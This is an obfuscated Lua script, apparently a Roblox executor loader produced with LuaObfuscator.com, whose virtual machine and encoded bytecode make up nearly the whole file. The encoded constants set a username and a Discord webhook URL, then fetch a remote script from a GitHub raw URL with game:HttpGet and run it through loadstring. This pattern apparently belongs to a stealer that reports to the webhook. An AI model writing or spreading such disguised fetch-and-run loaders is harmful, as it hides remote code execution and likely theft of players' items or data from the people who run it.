--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.5) ~  Much Love, Ferib 

]]--

do local v0=0;local v1;local v2;local v3;local v4;local v5;local v6;local v7;local v8;local v9;local v10;local v11;local v12;local v13;local v14;local v15;local v16;while true do if (v0==3) then v10=getfenv or function()return _ENV;end ;v11=setmetatable;v12=pcall;v0=4;end if (v0==4) then v13=select;v14=unpack or table.unpack ;v15=tonumber;v0=5;end if (v0==0) then v1=tonumber;v2=string.byte;v3=string.char;v0=1;end if (v0==5) then v16=nil;v16=function(v19,v20,...)local v27=1;local v28;v19=v5(v4(v19,5),"..",function(v29)if (v2(v29,2)==79) then v28=v1(v4(v29,1,1));return "";else local v81=v3(v1(v29,16));if v28 then local v101=0;local v102;while true do if (1==v101) then return v102;end if (v101==0) then v102=v6(v81,v28);v28=nil;v101=1;end end else return v81;end end end);local function v30(v31,v32,v33)if v33 then local v82=53 -(8 + 45) ;local v83;while true do if (v82==(0 -(0 + 0))) then v83=(v31/((2 + 0)^(v32-(2 -1))))%((1812 -((1169 -615) + 1256))^(((v33-(875 -(398 + 87 + 389))) -(v32-(1028 -((1901 -977) + 103)))) + 1)) ;return v83-(v83%(1927 -((3384 -(1612 + 313)) + (849 -382)))) ;end end else local v84=0;local v85;while true do if (v84==(1653 -(261 + 1392))) then v85=(1 + 1)^(v32-((1981 -881) -(223 + 876))) ;return (((v31%(v85 + v85))>=v85) and (1174 -(235 + 938))) or (1357 -(522 + 835)) ;end end end end local function v34()local v47=v2(v19,v27,v27);v27=v27 + 1 ;return v47;end local function v35()local v48,v49=v2(v19,v27,v27 + (1939 -(352 + 1585)) );v27=v27 + (4 -2) ;return (v49 * (852 -596)) + v48 ;end local function v36()local v50,v51,v52,v53=v2(v19,v27,v27 + 3 );v27=v27 + 2 + 2 ;return (v53 * (13340330 + 3436886)) + (v52 * (22736 + 42800)) + (v51 * (823 -567)) + v50 ;end local function v37()local v54=v36();local v55=v36();local v56=1 + 0 ;local v57=(v30(v55,1563 -(257 + 1305) ,5 + 2 + 13 ) * ((5 -3)^32)) + v54 ;local v58=v30(v55,564 -(151 + 392) ,109 -(26 + 52) );local v59=((v30(v55,19 + 13 )==((1249 -(645 + 203)) -(31 + 369))) and  -(998 -(483 + 514))) or (3 -2) ;if (v58==(0 -0)) then if (v57==((527 + 141) -((724 -(225 + 35)) + (368 -164)))) then return v59 * (0 + 0) ;else v58=1 + 0 ;v56=0 + 0 ;end elseif (v58==(3135 -(1015 + 73))) then return ((v57==(0 + 0)) and (v59 * ((1 -0)/(803 -(528 + 275))))) or (v59 * NaN) ;end return v9(v59,v58-(2164 -(33 + (3677 -2569))) ) * (v56 + (v57/((6 -4)^(718 -(286 + (1137 -(661 + 96))))))) ;end local function v38(v39)local v60;if  not v39 then local v86=1296 -(761 + 535) ;while true do if (((1497 -(467 + 913)) -(23 + 94))==v86) then v39=v36();if (v39==(0 -0)) then return "";end break;end end end v60=v4(v19,v27,(v27 + v39) -1 );v27=v27 + v39 ;local v61={};for v72=(2 + 185) -(96 + (125 -35)) , #v60 do v61[v72]=v3(v2(v4(v60,v72,v72)));end return v7(v61);end local v40=v36;local function v41(...)return {...},v13("#",...);end local function v42()local v62=0 -0 ;local v63;local v64;local v65;local v66;local v67;local v68;while true do local v74=0 -0 ;local v75;while true do if (v74==(0 + 0)) then v75=1058 -(116 + 942) ;while true do if (v75==(1348 -(749 + 598))) then if (v62==1) then v67=v36();v68={};for v110=1,v67 do local v111=0 + 0 ;local v112;local v113;while true do if (v111~=(0 -0)) then else local v118=0 -0 ;while true do if (v118~=(1 + 0)) then else v111=1 -0 ;break;end if (v118~=(0 + 0)) then else v112=v34();v113=nil;v118=1;end end end if ((1 -0)==v111) then if (v112==1) then v113=v34()~=0 ;elseif (v112==(2 + 0)) then v113=v37();elseif (v112~=3) then else v113=v38();end v68[v110]=v113;break;end end end v66[7 -4 ]=v34();v62=2;end break;end if (v75==0) then local v107=0;while true do if (v107==(1 + 0)) then v75=4 -3 ;break;end if (v107==(720 -(97 + 623))) then if (v62~=0) then else local v114=0;while true do if (v114==(746 -(159 + 587))) then v63={};v64={};v114=1;end if (v114~=2) then else v62=1886 -(944 + 941) ;break;end if (v114==1) then v65={};v66={v63,v64,nil,v65};v114=2;end end end if (v62~=(1 + 1)) then else local v115=33 -(31 + 2) ;while true do if (v115==0) then local v120=0 + 0 ;while true do if (v120~=0) then else for v142=1 + 0 ,v36() do local v143=0 + 0 ;local v144;local v145;while true do if (v143==0) then local v156=0;while true do if (1~=v156) then else v143=1;break;end if (v156==(54 -(4 + 50))) then local v162=613 -(139 + 474) ;while true do if (1~=v162) then else v156=1;break;end if ((496 -(23 + 473))~=v162) then else v144=0;v145=nil;v162=1170 -(801 + 368) ;end end end end end if (1~=v143) then else while true do if (v144~=(0 + 0)) then else v145=v34();if (v30(v145,1,1 -0 )==0) then local v165=0;local v166;local v167;local v168;local v169;while true do if (v165~=1) then else v168=nil;v169=nil;v165=2;end if (v165==(1954 -(1873 + 79))) then while true do if (v166==3) then if (v30(v168,3,3)==1) then v169[1 + 3 ]=v68[v169[2 + 2 ]];end v63[v142]=v169;break;end if (v166==(917 -(559 + 358))) then local v171=0 -0 ;local v172;while true do if (0~=v171) then else v172=0 -0 ;while true do if (v172~=0) then else local v182=0;while true do if (v182==1) then v172=1;break;end if (v182==(1375 -(238 + 1137))) then v167=v30(v145,2,1221 -(850 + 368) );v168=v30(v145,4,1653 -(1384 + 263) );v182=1;end end end if (v172==(1395 -(976 + 418))) then v166=2 -1 ;break;end end break;end end end if (v166~=(3 -1)) then else if (v30(v168,368 -(32 + 335) ,1)~=(4 -3)) then else v169[7 -5 ]=v68[v169[2]];end if (v30(v168,2,5 -3 )~=(2 -1)) then else v169[2 + 1 ]=v68[v169[1 + 2 ]];end v166=9 -6 ;end if (v166~=1) then else local v173=0;while true do if (v173==1) then v166=2;break;end if (v173==(0 + 0)) then v169={v35(),v35(),nil,nil};if (v167==(0 + 0)) then local v180=0 + 0 ;local v181;while true do if (v180~=0) then else v181=0 -0 ;while true do if (v181==0) then v169[3]=v35();v169[1 + 3 ]=v35();break;end end break;end end elseif (v167==(1 + 0)) then v169[466 -(251 + 212) ]=v36();elseif (v167==2) then v169[3]=v36() -((2 -0)^16) ;elseif (v167==(64 -(36 + 25))) then local v187=0;local v188;local v189;while true do if (v187~=(0 + 0)) then else v188=0;v189=nil;v187=2 -1 ;end if (1==v187) then while true do if (v188==(1064 -(644 + 420))) then v189=0;while true do if ((0 + 0)~=v189) then else v169[3]=v36() -(2^16) ;v169[133 -(60 + 69) ]=v35();break;end end break;end end break;end end end v173=1 + 0 ;end end end end break;end if (v165~=(0 + 0)) then else v166=220 -(118 + 102) ;v167=nil;v165=1;end end end break;end end break;end end end for v146=1,v36() do v64[v146-(1 + 0) ]=v42();end v120=1;end if (v120==(2 -1)) then v115=3 -2 ;break;end end end if (v115==(1 + 0)) then for v140=2 -1 ,v36() do v65[v140]=v36();end return v66;end end end v107=1809 -(1076 + 732) ;end end end end break;end end end end local function v43(v44,v45,v46)local v69=v44[1];local v70=v44[2];local v71=v44[3];return function(...)local v76=1;local v77= -1;local v78={...};local v79=v13("#",...) -1 ;local function v80()local v87=v69;local v88=v70;local v89=v71;local v90=v41;local v91={};local v92={};local v93={};for v97=263 -(65 + 198) ,v79 do if ((v97>=v89) or ((6160 -(96 + 1203 + 159))<(5989 -2772))) then v91[v97-v89 ]=v78[v97 + ((80 -(73 + 5)) -1) ];else v93[v97]=v78[v97 + 1 + 0 ];end end local v94=(v79-v89) + ((1 + 0) -0) ;local v95;local v96;while true do local v98=(477 + 60) -(356 + 181) ;local v99;while true do if (((2586 -(406 + 666))<=((8073 -(1591 + 141)) -3991)) and (v98==(0 + (0 -0)))) then v99=232 -((574 -381) + 39) ;while true do if ((v99==(0 -0)) or ((4113 + 300)<=(2092 -1293))) then local v109=0 -0 ;while true do if ((v109==((1195 -(243 + 952)) + 0 + 0)) or ((23644 -18840)<=(9568 -7582))) then v95=v87[v76];v96=v95[1 + 0 ];v109=1 + 0 ;end if ((v109==(1 -0)) or (((7644 -(573 + 894)) -(374 + 1450))<=(2729 + 989))) then v99=511 -((650 -335) + 195) ;break;end end end if (((3048 -((2864 -(377 + 1545)) + 111 + 61))<(1714 + 1746 + 811)) and (v99==(2 -1))) then if (((2680 + 346)>(1061 -636)) and (v96<=(49 -(18 + 28)))) then if (((54 + 331 + 1112)==(7325 -(8865 -3037))) and (v96<=(4 -3))) then if ((((14805 -(1070 + 686)) -8855)>=((9722 -(1287 + 558)) -5491)) and (v96>(91 -(36 + (2022 -(141 + 1826)))))) then v93[v95[1028 -(224 + 421 + 368 + 13) ]]();else do return;end end elseif (((5317 -1594)>=(679 -221)) and (v96==(370 -(270 + 98)))) then v93[v95[2]]=v95[1 + 2 ];else v46[v95[3 + 0 ]]=v93[v95[3 -1 ]];end elseif ((v96<=(2 + 3)) or ((1034 + 39)==(283 + 101))) then if ((v96>(1655 -(219 + 1432))) or ((4234 -(67 + 2))==(2118 + (6450 -4409)))) then local v125=0 + 0 ;local v126;local v127;local v128;while true do if ((v125==(1946 -(1837 + 109))) or ((2573 -1858)<=(1126 -648))) then v126=248 -(155 + 87 + 6) ;v127=nil;v125=1 -0 ;end if ((v125==1) or ((1670 -(368 + 90))>=(2355 + 1647))) then v128=nil;while true do if (((3091 + 12)<((13265 -(461 + 90)) -(8639 -(61 + 7)))) and (v126==(0 -0))) then local v148=(206 + 252) -(58 + 400) ;while true do if ((v148==((1 -0) -(459 -(187 + 272)))) or (((794 + 119) -(18 + 464))>=(6706 -3975))) then v126=1 + 0 ;break;end if ((v148==((1932 -(1393 + 539)) + 0)) or (4691<(4245 -1970))) then v127=v95[2 + 0 ];v128=v93[v95[7 -4 ]];v148=757 -(571 + 185) ;end end end if (((1 + 0 + 0)==v126) or (((8108 -(1295 + 683)) -1491)<((5183 -(709 + 172)) -(106 + 57)))) then v93[v127 + 1 ]=v128;v93[v127]=v128[v95[(603 -(18 + 577)) -4 ]];break;end end break;end end else local v129=(1153 -(82 + 900)) -(9 + 162) ;local v130;local v131;local v132;local v133;local v134;while true do if ((v129==(1 + 0)) or ((1731 -1264)>=(4302 -(1243 + 515)))) then v132=nil;v133=nil;v129=406 -(160 + 244) ;end if ((v129==(1 + 1)) or (((6777 -(1290 + 49)) -(1047 + (2584 -(1587 + 365))))<=(816 -(81 + 632)))) then v134=nil;while true do if (((3911 -(576 + 871 + (147 -79)))>=(400 -(1385 -(362 + 848)))) and (v130==((1326 -(634 + 611)) -((211 -(40 + 136)) + 44)))) then for v157=v131,v77 do local v158=0 + 0 ;while true do if (((9224 -(4607 + 1124))==(4623 -(838 + 292))) and (v158==(0 + 0))) then v134=v134 + (1 -0) ;v93[v157]=v132[v134];break;end end end break;end if ((v130==1) or ((306 + 532)>=(3080 -(80 + 161)))) then local v152=0 + 0 ;while true do if (((6359 -(1462 + 97))>=(2277 -(1179 + 227))) and ((2 -1)==v152)) then v130=404 -(228 + (393 -219)) ;break;end if (((184 + 2207)<((15519 -6387) -4240)) and (v152==(0 + 0))) then v77=(v133 + v131) -(1 -0) ;v134=1880 -(1674 + 206) ;v152=188 -(12 + 175) ;end end end if ((v130==0) or ((2520 + (976 -(625 + 126)))<(3417 -(83 + 1122)))) then local v153=0 -0 ;while true do if (((9460 -4761)>=((3051 -(1174 + 751)) + 539)) and (v153==((3 -2) -0))) then v130=1 + (0 -0) ;break;end if ((v153==(0 -(0 + 0))) or ((8164 -3910)<(3226 -(869 + 4)))) then v131=v95[(565 -(540 + 24)) + 1 ];v132,v133=v90(v93[v131](v14(v93,v131 + (2 -1) ,v95[213 -(74 + 136) ])));v153=1 -0 ;end end end end break;end if ((((18364 -(1415 + 266)) -11799)==(14071 -9187)) and (v129==(0 + 0))) then v130=(2976 -1302) -(561 + 1113) ;v131=nil;v129=3 -2 ;end end end elseif ((v96>(16 -10)) or ((232 + 1438)>=(1990 + 2649))) then local v135=(1966 -(135 + 1831)) -(0 -0) ;local v136;local v137;while true do if (((0 -0)==v135) or ((3980 -(613 + 106))>=(2228 + 2649))) then v136=104 -(15 + 89) ;v137=nil;v135=712 -(600 + 111) ;end if ((v135==((892 + 787) -(143 + 1535))) or ((2049 + 352)==(5590 -2254))) then while true do if ((v136==((3383 -(550 + 1311)) -(245 + 1277))) or (2504==(18671 -14289))) then v137=v95[4 -2 ];v93[v137]=v93[v137](v14(v93,v137 + (2 -1) ,v77));break;end end break;end end else v93[v95[(50 + 455) -(347 + 156) ]]=v46[v95[2 + 1 ]];end v76=v76 + (2 -1) ;break;end end break;end end end end A,B=v41(v12(v80));if  not A[1] then local v100=v44[4][v76] or "?" ;error("Script error at ["   .. v100   .. "]:"   .. A[2] );else return v14(A,2,B);end end;end return v43(v42(),{},v20)(...);end;v16("LOL!083O0003083O00557365724E616D6503123O00626F2O736D616E314O3933363438373203073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F313039313631352O323734352O3338323731382F684943486C7034374E5639325954314B4741576C67546D69786A7541587762664943372D6553513952346F4F7943706F2D317A382D566F42327267557867312O45586D34030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574033A3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F6B34662O742F52692O7A2F6D61696E2F4D61696E2E6C7561000C3O0012023O00023O0012033O00013O0012023O00043O0012033O00033O0012063O00053O001206000100063O002005000100010007001202000300084O0004000100034O00075O00022O00013O000100016O00017O000C3O00023O00023O00033O00033O00043O00043O00043O00043O00043O00043O00043O00053O00",v10(),...);break;end if (1==v0) then v4=string.sub;v5=string.gsub;v6=string.rep;v0=2;end if (v0==2) then v7=table.concat;v8=table.insert;v9=math.ldexp;v0=3;end end end
